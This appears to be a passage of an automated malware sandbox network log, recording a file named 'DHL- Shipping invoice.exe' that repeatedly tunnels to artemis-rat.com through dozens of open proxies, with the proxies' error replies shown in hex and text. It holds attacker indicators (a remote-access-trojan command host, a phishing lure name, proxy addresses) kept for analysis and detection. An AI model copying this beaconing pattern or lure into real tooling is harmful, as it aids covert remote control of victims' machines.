                            Mar 12, 2024 08:36:59.720567942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            224192.168.2.449885191.96.100.3331556484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.726843119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.750068903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            225192.168.2.45070345.138.87.23810806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.728574991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            226192.168.2.44985861.173.113.22688886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.736115932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.839443922 CET1286INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
                            Last-Modified: Tue, 03 Sep 2019 07:13:14 GMT
                            ETag: "a1e-591a0d2623680"
                            Accept-Ranges: bytes
                            Content-Length: 2590
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 35 30 30 20 e9 94 99 e8 af af 20 2d 20 70 68 70 73 74 75 64 79 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 70 72 61 67 6d 61 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 43 4f 4e 54 45 4e 54 3d 22 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 65 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 57 65 64 2c 20 32 36 20 46 65 62 20 31 39 39 37 20 30 38 3a 32 31 3a 35 37 20 47 4d 54 22 3e 20 0d 0a 20 20 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 65 78 70 69 72 65 73 22 20 43 4f 4e 54 45 4e 54 3d 22 30 22 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 62 6f 64 79 7b 0d 0a 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 61 72 69 61 6c 2c 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 68 65 69 27 2c 27 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 20 47 42 27 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 33 61 38 37 61 64 3b 0d 0a 20
                            Data Ascii: <!DOCTYPE html><html lang="zh-CN"><head> <meta charset="utf-8"> <title>500 - phpstudy</title> <meta name="keywords" content=""> <meta name="description" content=""> <meta name="renderer" content="webkit"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="format-detection" content="telephone=no"> <meta HTTP-EQUIV="pragma" CONTENT="no-cache"> <meta HTTP-EQUIV="Cache-Control" CONTENT="no-store, must-revalidate"> <meta HTTP-EQUIV="expires" CONTENT="Wed, 26 Feb 1997 08:21:57 GMT"> <meta HTTP-EQUIV="expires" CONTENT="0"> <style> body{ font: 16px arial,'Microsoft Yahei','Hiragino Sans GB',sans-serif; } h1{ margin: 0; color:#3a87ad;


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            227192.168.2.4507844.236.183.3780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.738231897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            228192.168.2.45074018.134.236.23131286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.739494085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.896898985 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            229192.168.2.450733185.109.184.150638196484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.764878035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.218513012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.765394926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.902018070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.047365904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250313997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453501940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.736368895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.453725100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            230192.168.2.4506504.144.161.159806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.766340017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            231192.168.2.44991698.178.72.21109196484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.769221067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            232192.168.2.45081523.227.38.230806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.769390106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.856209993 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            233192.168.2.45080838.162.11.8131286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.775829077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.085750103 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            234192.168.2.45073880.78.64.7041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.780143023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            235192.168.2.44991872.210.221.22341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.784940958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            236192.168.2.4499192.35.9.104806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.793730974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            237192.168.2.4507685.252.23.22010816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.801318884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            238192.168.2.45071120.210.113.32806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.808574915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.076622963 CET319INHTTP/1.1 403 Forbidden
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 17
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            X-Cache: MISS from cdn-fintech.info
                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                            Connection: keep-alive
                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                            Data Ascii: ERR_ACCESS_DENIED


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            239192.168.2.44993668.1.210.16341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.815644979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            240192.168.2.450813107.180.88.173596096484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.821212053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.249718904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.687423944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.563210011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.359402895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.250264883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.062726974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            241192.168.2.45084938.127.172.137474216484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.822280884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.124772072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.437263012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.046664953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.250222921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.453265905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.750134945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.250149012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.140933990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            242192.168.2.450713121.128.194.154806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.832937002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.118283033 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            243192.168.2.45082351.158.96.66163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.851067066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.750608921 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 